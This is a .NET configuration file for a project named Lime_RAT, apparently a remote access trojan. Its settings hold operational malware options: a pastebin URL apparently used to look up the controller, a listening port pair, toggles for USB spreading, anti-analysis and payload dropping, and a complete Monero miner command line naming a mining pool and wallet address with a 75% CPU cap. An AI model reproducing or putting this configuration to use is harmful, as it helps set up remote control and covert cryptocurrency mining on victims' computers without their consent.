<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
            <section name="Lime_RAT.My.MySettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false"/>
        </sectionGroup>
    </configSections>
    <system.diagnostics>
        <sources>
            <!-- This section defines the logging configuration for My.Application.Log -->
            <source name="DefaultSource" switchName="DefaultSwitch">
                <listeners>
                    <add name="FileLog"/>
                    <!-- Uncomment the below section to write to the Application Event Log -->
                    <!--<add name="EventLog"/>-->
                </listeners>
            </source>
        </sources>
        <switches>
            <add name="DefaultSwitch" value="Information"/>
        </switches>
        <sharedListeners>
            <add name="FileLog" type="Microsoft.VisualBasic.Logging.FileLogTraceListener, Microsoft.VisualBasic, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL" initializeData="FileLogWriter"/>
            <!-- Uncomment the below section and replace APPLICATION_NAME with the name of your application to write to the Application Event Log -->
            <!--<add name="EventLog" type="System.Diagnostics.EventLogTraceListener" initializeData="APPLICATION_NAME"/> -->
        </sharedListeners>
    </system.diagnostics>
<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/></startup>
    <userSettings>
        <Lime_RAT.My.MySettings>
            <setting name="Notif" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="pastebin" serializeAs="String">
                <value>https://pastebin.com/raw/DDTVwwbu</value>
            </setting>
            <setting name="filename" serializeAs="String">
                <value />
            </setting>
            <setting name="directory" serializeAs="String">
                <value />
            </setting>
            <setting name="subfolder" serializeAs="String">
                <value />
            </setting>
            <setting name="btc" serializeAs="String">
                <value />
            </setting>
            <setting name="downloader" serializeAs="String">
                <value />
            </setting>
            <setting name="drop" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="Appdata" serializeAs="String">
                <value />
            </setting>
            <setting name="anti" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="usb" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="pin" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="once" serializeAs="String">
                <value>False</value>
            </setting>
            <setting name="port" serializeAs="String">
                <value>8989:2323</value>
            </setting>
            <setting name="Encryption" serializeAs="String">
                <value />
            </setting>
            <setting name="Delay" serializeAs="String">
                <value>1</value>
            </setting>
            <setting name="xmrcpu" serializeAs="String">
                <value>2</value>
            </setting>
            <setting name="xmrurl" serializeAs="String">
                <value />
            </setting>
            <setting name="xmruser" serializeAs="String">
                <value />
            </setting>
            <setting name="xmrpass" serializeAs="String">
                <value />
            </setting>
            <setting name="xmrcustom" serializeAs="String">
                <value>-B --donate-level=0 -a cryptonight --url=gulf.moneroocean.stream:80 -u 49H8Kbf15JFN2diG5evGHA5G49qhgFBuDid86z3MKxTv59dcqySCzFWUL3SgsEk2SufzTziHp3UE5P8BatwuyFuv1bBKQw2 -p x -R --variant=-1 --max-cpu-usage=75</value>
            </setting>
            <setting name="PING_VALUE" serializeAs="String">
                <value>45</value>
            </setting>
        </Lime_RAT.My.MySettings>
    </userSettings>
</configuration>
